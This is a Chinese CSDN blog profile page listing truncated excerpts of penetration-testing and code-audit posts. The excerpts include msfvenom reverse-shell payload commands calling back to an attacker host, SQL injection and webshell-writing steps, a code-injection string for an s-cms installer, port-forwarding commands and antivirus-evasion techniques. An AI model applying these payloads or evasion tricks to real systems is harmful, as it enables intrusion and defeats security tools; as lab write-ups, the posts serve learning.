cxk331
码龄7年
关注
提问 私信
  • 博客:90,808
    动态:10
    90,818
    总访问量
  • 56
    原创
  • 1,860,977
    排名
  • 32
    粉丝
  • 0
    铁粉
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:四川省
  • 加入CSDN时间: 2017-12-22
博客简介:

cxk

博客描述:
cxk
查看详细资料
个人成就
  • 获得28次点赞
  • 内容获得15次评论
  • 获得135次收藏
创作历程
  • 57篇
    2019年
成就勋章
TA的专栏
  • 代码审计
    6篇
  • 实战
    3篇
  • 工具使用
    3篇
  • 提权
    1篇
  • cve复现
    3篇
  • 内网渗透
    5篇
  • 亮神文章复现
    19篇
  • web安全
    2篇
  • python学习
    5篇
  • 端口流量转发
    5篇
  • php
    1篇
  • 免杀
    1篇
兴趣领域 设置
  • 网络空间安全
    系统安全web安全
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

最新仿icloud web管理,asp版本。欢迎学习交流。

发布资源 2022.08.19 ·
zip

myBase.exe

发布资源 2020.07.06 ·
exe

爬某博客

import reimport requestsfrom bs4 import BeautifulSoupimport timerequests.packages.urllib3.disable_warnings()headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \ ...
原创
发布博客 2019.11.17 ·
282 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

一次渗透

注入1)网站首页2)简单and 1=1 ,1=2判断注入点3)order by 确定字段数为9,显示位union select 1,2…判断为4和84)判断权限root权限,思考使用into outfile直接写shell或者是外联数据库,使用日志getshell5)into outfile写shell。判断mysql版本为5.5,既必须查看secure-file-priv导...
原创
发布博客 2019.08.12 ·
776 阅读 ·
1 点赞 ·
1 评论 ·
2 收藏

s-cms后台getshell

重装导致任意代码执行代码分析在install.php中判断data/first.txt中值是否为0在后台存在任意txt文件修改(此处不分析代码,系统自带)将0改为任意值再看install.php142-163行将获取到的数据库信息进行连接,当成功后就进行数据库信息写入。此处仅需绕过数据库写入与conn.php文件引号的逃逸。既只用在数据库名处填写3333;#”);phpinf...
原创
发布博客 2019.08.12 ·
653 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

特征码简单修改学习

修改字符串大小写法使用C32打开程序,选中然后name小型变为大写等价替换法(相似指令替换)XOR EAX, EAXXOR EAX, EAXJE 10000418改为:XOR EAX, EAXJz 10000418通用跳转法将特征码换到空区域,在跳转回来跳走跳回...
原创
发布博客 2019.08.09 ·
2448 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

加花的简单学习

目标getpass1)使用zeroadd进行简单的加区2)使用_LordPE_fix定位加区位置,与文件入口3)使用OD进行简单加花,保存4) 更改入口点5)保存运行6)不科学的过了火绒。。。使用360被报毒...
原创
发布博客 2019.08.08 ·
239 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

baiyicms的一次审计

下载安装好后,在admin->controller->file.php文件的edit方法中,使用allowEditor过滤后缀,判断是否可写入跟进函数,发现html,css,js,txt文件可写入下面判断又为false,即可写入html,css,js,txt文件又因为该cms使用了模板引擎加载,既模板的html文件会被渲染为php执行,造成了任意代码执行。漏洞演示:登...
原创
发布博客 2019.08.04 ·
574 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

对hsycms的一次审计

非最新版本前台注入在common.php的32行,直接进行sql查询搜索prevNext方法哪里被调用,在show.php的38被调用,可看到传入参数跟进ID,在其第10行跟进input方法使用其方法传参且无过滤,导致ID可控,存在注入。漏洞利用python.exe .\sqlmap.py -u http://q.com/product/132 -D hsycms -T s...
原创
发布博客 2019.08.02 ·
1258 阅读 ·
1 点赞 ·
1 评论 ·
2 收藏

一次简单手工注入

一次简单的手工注入注入点http://xxx/news.php?newsid=18收集了下IP,不能sqlmap了,就只能手工了。1)确定注入点。经典 and 1=1 1=22)简单的order by 确定字段数。一直报错,感觉是被过滤了,后面使用注释符也不行使用union select 1,2,3也报错,确定不了字段数。3)尝试报错注入成功payload:union ...
原创
发布博客 2019.07.29 ·
314 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

一次失败的审计

项目地址https://www.douphp.com/DouPHP v1.5 Release 20190711工具:phpstudy+navicat+Seay源代码审计系统+PhpStorm项目目录审计注入首先在product.php的19行,看到使用request接受id与unique_id跟进get_legal_id方法判断ID是否为数字,is_unique_id无法找...
原创
发布博客 2019.07.22 ·
236 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

记录一次TP框架开发学习

之前自己看了php基础就去审计,发现很多方法都不知道,审计呢也是审计不出洞,知识还没到位,便去看了TP框架开发,有助于审计的学习。项目地址https://www.php.cn/course/332.html开发工具JetBrains PhpStorm+navicat+phpstudy+tp3.2.3流程简介0X00 tp3.2.3介绍目录index.php 入口文件README...
原创
发布博客 2019.07.18 ·
249 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

记一次免杀webshell的工具使用及powershell的编码

原项目地址https://github.com/yzddmr6/webshell-venom简单使用python py.py > test.phpD盾查杀(检验是否免杀的唯一标准)目前仅支持asp.aspx.php。but asp的免杀效果较差。笔者开始使用的是powershell,但是生成的shell并不能使用,后面发现是powershell的编码原因。用ps生成的...
原创
发布博客 2019.07.16 ·
1518 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

GreatSCT使用

GreatSCT简介GreatSCT目前得到了@ConsciousHacker的支持,该项目名为Great SCT(Great Scott)。Great SCT是一个用于生成应用程序白名单绕过的开源项目。此工具适用于红队和蓝队。它是一种用来生成Metasploit payload的工具,可绕过常见的防病毒解决方案和应用程序白名单解决方案。项目地址:https://github.com/Grea...
原创
发布博客 2019.07.11 ·
628 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

某公众号之图片反弹shell(标题党)

某公众号之图片反弹shell具体公众号猜吧,哈哈哈哈原项目地址https://github.com/peewpw/Invoke-PSImage攻击机 kali 192.168.5.102靶机 win10 192.168.0.311)生成一个msf ps1脚本msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.5....
原创
发布博客 2019.07.04 ·
777 阅读 ·
0 点赞 ·
2 评论 ·
1 收藏

ngrok的使用

ngrok的使用地址http://www.ngrok.cc1)开通隧道2)生成msf payload,使用ngrok的地址与端口生成payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.com LPORT=10842 -f exe> shell.exe3)启动ngrok客户端,msf启动ngrok....
原创
发布博客 2019.07.02 ·
762 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

EW使用

EW使用靶机 win7 192.168.5.101攻击机 win 10 192.168.0.31攻击机 kali 192.168.5.1021)ew 自身的各个选项用途说明-l 指定要监听的本地端口-d 指定要反弹到的机器 ip-e 指定要反弹到的机器端口-f 指定要主动连接的机器 ip-g 指定要主动连接的机器端口-t 指定超时时长,默认为 10002)执行正向转发在k...
原创
发布博客 2019.07.02 ·
8841 阅读 ·
0 点赞 ·
0 评论 ·
9 收藏

portfwd使用

一款内置于msf的工具靶机 win7 192.168.5.101攻击机 win 10 192.168.0.31攻击机 kali 192.168.5.102先配置msf,并反弹会话转发,把win7 3389转发到kali的33333端口portfwd add‐l 33333 ‐r 192.168.5.101 ‐p 3389使用win10 远程桌面功能访问kali的52端口,既访...
原创
发布博客 2019.07.01 ·
2202 阅读 ·
1 点赞 ·
0 评论 ·
1 收藏

lcx使用

lcx使用win7 192.168.5.101win 10 192.168.0.31kali 192.168.5.102lcx本机: lcx -listen 2222 33332222为转发端口,3333为本机任意未被占用的端口肉鸡:lcx -slave 2.2.2.2 2222 127.0.0.1 33892.2.2.2 为本机IP,2222为转发端口,127.0.0.1为肉鸡内...
原创
发布博客 2019.07.01 ·
722 阅读 ·
0 点赞 ·
1 评论 ·
1 收藏
加载更多